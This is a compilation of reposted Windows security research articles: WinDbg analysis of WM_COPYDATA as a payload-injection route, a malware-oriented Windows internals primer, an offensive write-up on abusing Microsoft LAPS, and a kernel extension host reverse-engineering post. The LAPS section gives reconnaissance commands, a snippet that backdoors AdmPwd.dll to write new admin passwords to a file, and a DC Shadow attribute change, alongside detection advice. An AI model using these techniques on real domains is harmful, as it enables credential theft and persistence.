06 0000009832caf950 00007ffd6c011431 KERNEL32!BaseThreadInitThunk+0x14
07 0000009832caf980 0000000000000000 ntdll!RtlUserThreadStart+0x21

0:000> r
rax=00007ffd6af62bd0 rbx=0000000000000000 rcx=0000009832caf678
rdx=00000000000000b0 rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62bd0 rsp=0000009832caf618 rbp=0000009832caf829
 r8=0000000000000000  r9=00007ffd6afc3070 r10=0000000000000000
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h

Dumping the contents of first parameter in the RCX register shows some recognizable data sent by the example program. notepad!NPWndProc is obviously the callback procedure associated with the target window receiving WM_COPYDATA.

0:000> dps rcx
0000009832caf678  00000038000000b0
0000009832caf680  0000000000000001
0000009832caf688  0000000000000000
0000009832caf690  0000000000000070
0000009832caf698  0000000000000000
0000009832caf6a0  0000029258bbc070
0000009832caf6a8  000000000000004a       // WM_COPYDATA
0000009832caf6b0  00000000000c072e
0000009832caf6b8  0000000000000001
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000000000000078
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049

The structure passed to fnCOPYDATA isn’t part of the debugging symbols, but here’s what we’re looking at.

typedef struct _CAPTUREBUF {
    DWORD cbCallback;
    DWORD cbCapture;
    DWORD cCapturedPointers;
    PBYTE pbFree;              
    DWORD offPointers;
    PVOID pvVirtualAddress;
} CAPTUREBUF, *PCAPTUREBUF;

typedef struct _FNCOPYDATAMSG {
    CAPTUREBUF     CaptureBuf;
    PWND           pwnd;
    UINT           msg;
    HWND           hwndFrom;
    BOOL           fDataPresent;
    COPYDATASTRUCT cds;
    ULONG_PTR      xParam;
    PROC           xpfnProc;
} FNCOPYDATAMSG;

Continue to single-step (t) through the code and examine the contents of the registers.

0:000> r
r
rax=00007ffd6c039da0 rbx=0000000000000000 rcx=00007ff79cc131b0
rdx=000000000000004a rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62c16 rsp=0000009832caf5c0 rbp=0000009832caf829
 r8=00000000000c072e  r9=0000009832caf6c0 r10=0000009832caf678
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA+0x46:
00007ffd6af62c16 498b4a28        mov     rcx,qword ptr [r10+28h] ds:0000009832caf6a0=0000029258bbc070

0:000> u rcx
notepad!NPWndProc:
00007ff79cc131b0 4055            push    rbp
00007ff79cc131b2 53              push    rbx
00007ff79cc131b3 56              push    rsi
00007ff79cc131b4 57              push    rdi
00007ff79cc131b5 4154            push    r12
00007ff79cc131b7 4155            push    r13
00007ff79cc131b9 4156            push    r14
00007ff79cc131bb 4157            push    r15

We see a pointer to COPYDATASTRUCT is placed in r9.

0:000> dps r9
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000009832caf6f0
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049
0000009832caf6f8  002000740027006e
0000009832caf700  0077006f006e006b
0000009832caf708  0061006800770020
0000009832caf710  006f007400200074
0000009832caf718  0079006100730020
0000009832caf720  00000000000a0021
0000009832caf728  00007ffd6af61b0b USER32!GetMessageW+0x2b
0000009832caf730  0000009800000000
0000009832caf738  0000000000000001

This structure is defined in the debugging symbols, so we can dump it showing the values it contains.

0:000> dt uxtheme!COPYDATASTRUCT 0000009832caf6c0
   +0x000 dwData           : 1
   +0x008 cbData           : 0x34
   +0x010 lpData           : 0x0000009832caf6f0 Void

Finally, examine the lpData field that should contain the string we sent from process A.

0:000> du poi(0000009832caf6c0+10)
0000009832caf6f0  "I don't know what to say!."

We can see this address belongs to the stack allocated when thread was created.

0:000> !address 0000009832caf6f0

Usage:                  Stack
Base Address:           0000009832c9f000
End Address:            0000009832cb0000
Region Size:            0000000000011000 (  68.000 kB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE
Type:                   00020000          MEM_PRIVATE
Allocation Base:        0000009832c30000
Allocation Protect:     00000004          PAGE_READWRITE
More info:              ~0k

Examining the Thread Information Block (TIB) that is located in the Thread Environment Block (TEB) provides us with the StackBase and StackLimit.

0:001> dx -r1 (*((uxtheme!_NT_TIB *)0x9832e4a000))
(*((uxtheme!_NT_TIB *)0x9832e4a000))                 [Type: _NT_TIB]
    [+0x000] ExceptionList    : 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *]
    [+0x008] StackBase        : 0x9832cb0000 [Type: void *]
    [+0x010] StackLimit       : 0x9832c9f000 [Type: void *]
    [+0x018] SubSystemTib     : 0x0 [Type: void *]
    [+0x020] FiberData        : 0x1e00 [Type: void *]
    [+0x020] Version          : 0x1e00 [Type: unsigned long]
    [+0x028] ArbitraryUserPointer : 0x0 [Type: void *]
    [+0x030] Self             : 0x9832e4a000 [Type: _NT_TIB *]

OK, we can use WM_COPYDATA to deploy a payload into a target process IF it has a GUI attached to it, but it’s not useful unless we can execute it. Moreover, the stack is a volatile area of memory and therefore unreliable to use as a code cave. To execute it would require locating the exact address and using a ROP chain. By the time the ROP chain is executed, there’s no guarantee the payload will still be intact. So, we probably can’t use WM_COPYDATA on this occasion, but it’s worth remembering there are likely many ways of sharing a payload with another process using legitimate API that are less suspicious than using WriteProcessMemory or NtWriteVirtualMemory.

In the case of WM_COPYDATA, one would still need to determine the exact address in stack of payload. Contents of the Thread Environment Block (TEB) can be retrieved via the NtQueryThreadInformation API using the ThreadBasicInformation class. After reading the TebAddress, the StackLimit and StackBase values can be read. In any case, the volatility of the stack means the payload would likely be overwritten before being executed.

Summary

Avoiding the conventional API used to deploy and execute a payload all increase the difficulty of detection. PowerLoader used a code cave in existing section object and a ROP chain for execution. PowerLoaderEx, which is a PoC used the desktop heap, while the AtomBombing PoC uses a code cave in .data section of a DLL.

Windows Internals

Original text

To understand how malware can use and manipulate Windows then, we need to better understand the inner workings of the Windows operating system. In this article, we will examine the inner workings or Windows 32-bit systems so that we can better understand how malware can use the operating system for its malicious purposes.

Windows internals could fill several textbooks (and has), so I will attempt to just cover the most important topics and only in a cursory way. I hope to leave you with enough information though, that you can effectively reverse the malware in the following articles.

Virtual Memory

Virtual memory is the idea that instead of software directly accessing the physical memory, the CPU and the operating system create an invisible layer between the software and the physical memory.

The OS creates a table that the CPU consults called the page table that directs the process to the location of the physical memory that it should use.

Processors divide memory into pages

Pages are fixed sized chunks of memory. Each entry in the page table references one page of memory. In general, 32 -bit processors use 4k sized pages with some exceptions.

Kernel v User Mode

Having a page table enables the processor to enforce rules on how memory will be  accessed. For instance, page table entries often have flags that determine whether the page can be accessed from a non-privileged mode (user mode).

In this way, the operating system’s code can reside inside the process’s address space without concern that it will be accessed by non-privileged processes. This protects the operating system’s sensitive data.

This distinction between privileged vs. non-privileged mode becomes kernel (privileged) and non-privileged (user) modes.

Kernel memory Space

The kernel reserves 2gb of address space for itself. This address space contains all the kernel code, including the kernel itself and any other kernel components such as device drivers.

Paging

Paging is the process where memory regions are temporarily flushed to the hard drive when they have not been used recently. The processor tracks the time since a page of memory was last used and the oldest is flushed.  Obviously, physical memory is faster and more expensive than space on the hard drive.

The windows operating system tracks when a page was last accessed and then uses that information to locate pages that haven’t been accessed in a while. Windows then flushes their content to a file. The contents of the flushed pages can then be discarded and the space used by other information. When the operating system needs to access these flushed pages, a page fault will be generated and then system then does that the  information has «paged out» to a file. Then, the operating system will access the page file and pull the information back into memory to be used.

Objects and Handles

The Windows kernel manages objects using a centralized object manager component. This object manager is responsible for all kernel objects such as sections, files, and device objects, synchronization objects, processes and threads. It ONLY manages kernel objects.

GUI-related objects are managed by separate object managers that are implemented inside WIN32K.SYS

Kernel code typically accesses objects using direct pointers to the object data structures. Applications use handles for accessing individual objects

Handles

A handle is process specific numeric identifier which is an index into the processes private handle table. Each entry in the handle table contains a pointer to the underlying object, which is how the system associates handles with objects. Each handle entry also contains an access mask that determines which types of operations that can be performed on the object using this specific handle.

Processes

A process is really just an isolated memory address space that is used to run a program. Address spaces are created for every program to make sure that each program runs in its own address space without colliding with other processes. Inside a processes’ address space the system can load code modules, but must have at latest one thread running to do so.

Process Initialization

The creation of the process object and the new address space is the first step. When a new process calls the Win32 API CreateProcess, the API creates a process object and allocates a new memory address space for the process.

CreateProcess maps NTDLL.DLL and the program executable (the .exe file) into the newly created address space. CreateProcess creates the process’s first thread and allocates stack space it. The processes first thread is resumed and starts running in the LdrpInitialization function inside NTDLL.DLL

LdrpInitialization recursively traverses the primary executable’s import tables and maps them to memory every executable that is required.

At this point, control passes into LdrpRunInitializeRoutines, which is an internal NTDLL routine responsible for initializing all statically linked DLL’s currently loaded into the address space. The initialization process consists of a link each DLL’s entry point with the DLL_PROCESS_ATTACH constant. Once all the DLL’s are initialized, LdrpInitialize calls the thread’s real initialization routine, which is the BaseProcessStart function from KERNELL32.DLL. This function in turn calls the executable’s WinMain entry point, at which point the process has completed it’s initialization sequence.

Threads

At ant given moment, each processor in the system is running one thread. Instead of continuing to run a single piece of code until it completes, Windows can decide to interrupt a running thread at given given time and switch to execution of another thread.

A thread is a data structure that has a CONTEXT data structure.  This CONTEXT includes;

(1) the state of the processor when the thread last ran

(2) one or two memory blocks that are used for stack space

(3) stack space is used to save off current state of thread when                   context switched

(4) components that manage threads in windows are the scheduler and the dispatcher

(5) Deciding which thread get s to run for how long and perform context switch

Context Switch

Context switch is the thread interruption. In some cases, threads just give up the CPU on their own and the kernel doesn’t have to interrupt. Every thread is assigned a quantum, which quantifies has long the the thread can run without interruption. Once the quantum expires, the thread is interrupted and other threads are allowed to run. This entire process is transparent  to thread. The kernel then stores the state of the CPU registers before suspending and then restores that register state when the thread is resumed.

Win32 API

An API is a set of functions that the operating system makes available to application programs for communicating with the OS. The Win32 API is a large set of functions that make up the official low-level programming interface for Windows applications. The MFC is a common interface to the Win32 API.

The three main components of the  Win 32 API  are;

(1) Kernel or Base API’s: These are the non GUI related services such as I/O, memory, object and process an d thread management

(2) GDI API’s : these include low-level graphics services such a s those for drawing a line, displaying bitmap, etc.

(3) USER API’s : these are the higher level GUI-related services such as window management, menus, dialog boxes, user-interface controls.

System Calls

A system call is when a user mode code needs to cal a kernel mode function. This usually happens when an application calls an operating system API. User mode code invokes a special CPU instruction that tells the processor to switch to its privileged mode and call a dispatch routine. This dispatch routine then calls the specific system function requested from user mode.

PE Format

The Windows executable format is a PE (portable Executable). The term «portable» refers to format’s versatility in numerous environments and architectures.

Executable files are relocatable. This means that they could be loaded at a different virtual address each time they are loaded. An executable must coexist with other executables that are loaded in the same memory address.  Other than the main executable, every program has a certain number of additional executables loaded into its address space regardless of whether it has DLL’s of its own or not.

Relocation Issues

If two excutables attempt to be loaded into the same virtual space, one must be relocated to another virtual space. each executable is module is assigned a base address and if something is already there, it must be relocated.

There are never absolute memory addresses in executable headers, those only exist in the code. To make this work, whenever there is a pointer inside the executable header, it is always a relative virtual address (RVA).  Think of this as simply an offset. When the file is loaded, it is assigned a virtual address and the loaded calculates real virtual addresses out of RVA’s by adding the modules base address to an RVA.

Image Sections

An executable section is divided into individual sections in which the file’s contents are stored. Sections are needed because different areas in the file are treated differently by the memory manager when a module is loaded. This division takes place in the code section (also called text) containing the executable’s code and a data section containing the executable’s data.

When loaded, the memory manager sets the access rights on memory pages in the different sections based on their settings in the section header.

Section Alignment

Individual sections often have different access settings defined in the executable header. The memory manager must apply these access settings when an executable image is loaded. Sections must typically be page aligned when an executable is loaded into memory. It would take extra space on disk to page align sections on disk. Therefore, the PE header has two different kinds of alignment fields, section alignment and file alignment.

DLL’s

DLL’s allow a program to be broken into more than one executable file. In this way, overall memory consumption is reduced, executables are not loaded until features they implement are required. Individual components can be replaced or upgraded to modify or improve a certain aspect of the program.

DLL’s can dramatically reduce overall system memory consumption because the system can detect that a certain executable has been loaded into more than one address space, then map it into each address space instead of reloading it into a new memory location. DLL’s are different from static libraries (.lib) which linked to the executable.

Loading DLL’s

Static Linking is implemented by having each module list the the modules it uses and the functions it calls within each module. This is known as an import table (see IDA Pro tutorial). Run time linking refers to a different process whereby an executable can decide to load another executable in runtime and call a function from that executable.

PE Headers

A Portable Executable (PE) file starts with a DOS header.

  «This program cannot be run in DOS mode»

typedef struct _IMAGE_NT_HEADERS {

    DWORD Signature;

    IMAFE_FILE_HEADER Fileheader;

    IMAGE_OPTIONAL_HEADER32 OptionHeader;

}  Image_NT_HEADERS32, *PIMAGE_NT_HEADERS32

This data structure references two data structures which contain the actual PE header.

Imports and Exports

Imports and Exports are the mechanisms that enable the dynamic linking process of executables. The compiler has no idea of the actual addresses of the imported functions, only in runtime will these addresses be known. To solve this issue, the linker creates a import table that lists all the functions imported by the current module by their names.

Malicious use of Microsoft LAPS

Original text by Akijosberry

LAPS Overview:

LAPS (Local Administrator Password Solution) is a tool for managing local administrator passwords for domain joined computers. It stores passwords/secrets in a confidential attribute in the computer’s corresponding active directory object. LAPS eliminates the risk of lateral movement by generating random passwords of local administrators. LAPS solution is a Group Policy Client Side Extension (CSE) which is installed on all managed machines to perform all management tasks.

Domain administrators and anyone who has full control on computer objects in AD can read and write both pieces of information (i.e., password and expiration timestamp). Password’s stored in AD is protected by ACL, it is up to the sysadmins to define who can and who cannot read the attributes. When transferred over the network, both password and time stamp are encrypted by kerberos and when stored in AD both password and time stamp are stored in clear text.

Components of LAPS:
  • Agent – Group Policy Client Extension(CSE)
    • Event Logging and Random password generation
  • PowerShell Module
    • Solution configuration
  • Active Directory
    • Computer Object, Confidential attribute, Audit trail in security log of domain controller
Reconnaissance:

Firstly, we will identify whether LAPS solution has been installed on the machine which we had gained a foothold. We will leverage powershell cmdlet to identify if the admpwd.dll exist or not.

1Get-ChildItem ‘c:\program files\LAPS\CSE\Admpwd.dll’

The very next step would be identifying who has read access to ms-Mcs-AdmPwd. we can use Powerviewfor identifying users having read access to ms-Mcs-AdmPwd

12345Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs |Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and($_.ActiveDirectoryRights -match 'ReadProperty')}
PowerView_Cmd.png

If RSAT(Remote Server Administration Tools) is enabled on the victim machine, then there is an interesting way of identifying user’s having access to ms-Mcs-AdmPwd. we can simply fire the command:

1dsacls.exe 'Path to the AD DS Object'
Dumping LAPS password:

Once you have identified the user’s who has read access to ms-Mcs-AdmPwd, the next thing would be compromising those user accounts and then dumping LAPS password in clear text.

I already did a blog post on ‘Dump LAPS password in clear text‘  and would highly encourage readers to have look at that post as well.

Tip: It is highly recommended to provide ms-Mcs-AdmPwd  read access to only those who actually manage those computer objects and remove unwanted users from having read access.

Poisoning AdmPwd.dll:

Most of the previous research/attacks are focused on the server side (i.e., looking for accounts who can read the passwords) not on the client side. Microsoft’s LAPS is a client side extension which runs a single dll that manages password (admpwd.dll).

LAPS was based on open source solution called “AdmPwd” developed by Jiri Formacek and is a part of microsoft product portfolio since may 2015. The LAPS solution does not have integrity checks or signature verification for dll file. AdmPwd solution is compatible with Microsoft’s LAPS, so let’s poison the dll by compiling the project from source and replace it with the original dll. To replace the original dll administrative privilege is required and at this point we assume the user already has gained administrator privilege by LPE or any other means.

Now let’s add these 3-4 lines in the AdmPwd solution and compile the malicious dll. These lines will be added where the new password and time stamp would be reported to the AD.

1234wofstream backdoor;backdoor.open("c:\\backdoor.txt");backdoor << newPwd;backdoor.close();

In this way adversary will appear normal, passwords would be synced and will also comply with LAPS policy.

BONUS: Persistence of clear text password *

*Persistence till the time poisoned dll is unchanged.

Dectection/Prevention:
  • Validate the Integrity/Signature of admpwd.dll
  • File Integrity Monitoring (FIM) policy can be created to monitor and changes/modification to the dll.
  • Application whitelisting can be applied to detect/prevent poisoning.
  • Increase LAPS logging level by setting the registry value to 2 (Verbose mode, Log everything):
    HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\GPExtensions\{D76B9641-3288-4f75-942D-087DE603E3EA}\ExtensionDebugLevel

Note:  Above methods are just my ramblings, I am not sure whether some of these would detect or prevent.

Modifying searchFlags attribute:

The attribute of our interest is ms-Mcs-AdmPwd which is a confidential attribute.Let’s first identify searchFlags attribute of ms-Mcs-AdmPwd. We will be using active directory PS module.

SearchFlags_Attribute.png

The searchFlags attribute value is 904 (0x388). From this value we need to remove the 7th bit which is the confidential attribute. CF which is the 7 th bit (0x00000080) ie., After removing the confidential value(0x388-0x80) the new value is 0x308 ie., 776. We will leverage DC Shadow attack to modify the searchFlags attribute.

Detection/Prevention:
  • Anything which detects DC Shadow attack eg.,ALSID Team’s powershell script. ( It detects using the “LDAP_SERVER_NOTIFICATION_OID” and tracks what changes are registered in the AD infrastructure).
  • Microsoft ATA also detects malicious replications.
  • It can also be detected by comparing the metadata of the searchFlags attribute or even looking at the LocalChangeUSN which is inconsistent with searchFlags attribute.

Note: In my lab setup when i removed the confidential attribute from one DC it gets replicated to other DC’s as well (i.e., searchFlags attribute value 776 gets replicated to other DC’s). Another thing i noticed is after every change the SerachFlags version gets increased but in my lab setup it was not increasing after 10. If you find something different do let me know.

References:
https://technet.microsoft.com/en-us/mt227395.aspx
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
https://2017.hack.lu/archive/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf
https://github.com/GreyCorbel/admpwd
https://rastamouse.me/2018/03/laps—part-2/
http://adds-security.blogspot.com/2018/08/mise-en-place-dune-backdoor-laps-via.html
https://msdn.microsoft.com/en-us/library/cc223153.aspx
https://github.com/AlsidOfficial/UncoverDCShadow

Yes, More Callbacks — The Kernel Extension Mechanism

Original text by Yarden Shafir

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00rudocumented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallbackand search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);

typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY(unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRYstructure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know 🙂


Appendix A — Extension hosts initialized by NTOS:


Appendix B — functions pseudo-code:

NTSTATUS ExRegisterExtension(_Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PREGISTRATION_INFO RegistrationInfo)
{
	// Validate that version is ok and that FunctionTable is not sent without FunctionCount or vise-versa.
	if ( (RegistrationVersion & 0xFFFF0000 != 0x10000) || (RegistrationInfo->FunctionTable == nullptr && RegistrationInfo->FunctionCount != 0) ) 
	{ 
		return STATUS_INVALID_PARAMETER; 
	}

	// Skipping over some lock-related stuff,
	
	// Find the host with the matching version and id.
	PHOST_LIST_ENTRY pHostListEntry;
	pHostListEntry = ExpFindHost(RegistrationInfo->ExtensionId, RegistrationInfo->ExtensionVersion);

	// More lock-related stuff.	

	if (!pHostListEntry)
	{
		return STATUS_NOT_FOUND;
	}

	// Verify that the FunctionCount in the host doesn't exceed the FunctionCount supplied by the caller.
	if (RegistrationInfo->FunctionCount < pHostListEntry->FunctionCount)
	{
		ExpDereferenceHost(pHostListEntry);
		return STATUS_INVALID_PARAMETER;
	}

	// Check that the number of functions in FunctionTable matches the amount in FunctionCount.
	PVOID FunctionTable = RegistrationInfo->FunctionTable;
	for (int i = 0; i < RegistrationInfo->FunctionCount; i++)
	{	
		if ( RegistrationInfo->FunctionTable[i] == nullptr ) 
		{ 
			ExpDereferenceHost(pHostListEntry);
			return STATUS_ACCESS_DENIED; 
		}
	}

	// skipping over some more lock-related stuff

	// Check if there is already an extension registered for this host.
	if (pHostListEntry->FunctionTable != nullptr || FlagOn(pHostListEntry->Flags, 1) )
	{
		// There is something related to locks here
		ExpDereferenceHost(pHostListEntry);
		return STATUS_OBJECT_NAME_COLLISION;
	}

	// If there is a callback function for this host, call it before registering the extension, with 0 as the first parameter.
	if (pHostListEntry->FunctionAddress) 
	{ 
		pHostListEntry->FunctionAddress(0, pHostListEntry->ArgForFunction); 
	}

	// Set the FunctionTable in the host to the table supplied by the caller, or to MmBadPointer if a table wasn't supplied.
	if (RegistrationInfo->FunctionTable == nullptr)
	{
		pHostListEntry->FunctionTable = nt!MmBadPointer;
	}
	else
	{
		pHostListEntry->FunctionTable = RegistrationInfo->FunctionTable;
	}

	pHostListEntry->RundownRef = 0;

	// If there is a callback function for this host, call it after registering the extension, with 1 as the first parameter.
	if (pHostListEntry->FunctionAddress)
	{
		pHostListEntry->FunctionAddress(1, pHostListEntry->ArgForFunction);
	}

	// Here there is some more lock-related stuff

	// Set the HostTable of the calling driver to the table of functions listed in the host.
	if (RegistrationInfo->HostTable != nullptr)
	{
		*(PVOID)RegistrationInfo->HostTable = pHostListEntry->hostInterface;
	}

	// Return the initialized host to the caller in the output Extension parameter.
	*Extension = pHostListEntry;
	return STATUS_SUCCESS;
}

ExRegisterExtension.c hosted with ❤ by GitHub

NTSTATUS ExRegisterHost(_Out_ PHOST_LIST_ENTRY ExtensionHost, _In_ ULONG Unused, _In_ PHOST_INFORMATION HostInformation)
{
	NTSTATUS Status = STATUS_SUCCESS;

	// Allocate memory for a new HOST_LIST_ENTRY
	PHOST_LIST_ENTRY p = ExAllocatePoolWithTag(HostInformation->PoolType, 0x60, 'HExE');
	if (p == nullptr)
	{
		return STATUS_INSUFFICIENT_RESOURCES;
	}

	//
	// Initialize a new HOST_LIST_ENTRY 
	//
	p->Flags &= 0xFE;
	p->RefCount = 1;
	p->FunctionTable = 0;
	p->ExtensionId = HostInformation->ExtensionId;
	p->ExtensionVersion = HostInformation->ExtensionVersion;
	p->hostInterface = HostInformation->hostInterface;
	p->FunctionAddress = HostInformation->FunctionAddress;
	p->ArgForFunction = HostInformation->ArgForFunction;			
	p->Lock = 0; 			
	p->RundownRef = 0;		

	// Search for an existing listEntry with the same version and id.
	PHOST_LIST_ENTRY listEntry = ExpFindHost(HostInformation->ExtensionId, HostInformation->ExtensionVersion);
	if (listEntry)
	{
		Status = STATUS_OBJECT_NAME_COLLISION;
		ExpDereferenceHost(p);
		ExpDereferenceHost(listEntry);
	}
	else
	{
		// Insert the new HOST_LIST_ENTRY to the end of ExpHostList.
		if ( *lastHostListEntry != &firstHostListEntry )
		{
	      	    __fastfail();
		}

		firstHostListEntry->Prev = &p;
		p->Next = firstHostListEntry;
		lastHostListEntry = p;

		ExtensionHost = p;
	}
	
	return Status;
}

ExRegisterHost.c hosted with ❤ by GitHub

PHOST_LIST_ENTRY ExpFindHost(USHORT ExtensionId, USHORT ExtensionVersion)
{
	PHOST_LIST_ENTRY entry;
	for (entry == ExpHostList; ; entry = entry->Next)
	{
		if (entry == &ExpHostList) 
		{ 
			return 0; 
		}
		
		if ( *(entry->ExtensionId) == ExtensionId && *(entry->ExtensionVersion) == ExtensionVersion ) 
		{ 
			break; 
		}
	}
	InterlockedIncrement(entry->RefCount);
	return entry;
}

ExpFindHost.c hosted with ❤ by GitHub

void ExpDereferenceHost(PHOST_LIST_ENTRY Host)
{
  	if ( InterlockedExchangeAdd(Host.RefCount, 0xFFFFFFFF) == 1 )
	{
    		ExFreePoolWithTag(Host, 0);
	}
}

ExpDereferenceHost.c hosted with ❤ by GitHub


Appendix C — structures definitions:

struct _HOST_INFORMATION
{
